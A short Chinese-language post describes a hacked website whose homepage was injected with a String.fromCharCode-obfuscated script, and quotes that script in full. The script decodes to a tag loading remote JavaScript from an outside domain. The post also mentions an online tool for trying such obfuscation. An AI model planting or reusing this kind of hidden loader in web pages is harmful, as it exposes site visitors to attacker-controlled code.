前天测试的一个站,日收14页,还是去年10月份别人玩过的,今天被人改了,首页如下:
很粗心啊,
<script type="text/javascript"> var xt = String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,115,58,47,47,107,107,121,121,48,49,46,99,111,109,47,50,46,106,115,34,62,60,47,115,99,114,105,112,116,62); document.write(xt); </script>这段加密的js跟下面都重复了,看来还是对方站点太多,改的头皮发麻。
这种利用静态 String.fromCharCode() 方法返回由指定的UTF-16代码单元序列创建的字符串方式解释JS前几年就有了。
有需要的可以通过首页在线工具自行加密测试:
发表回复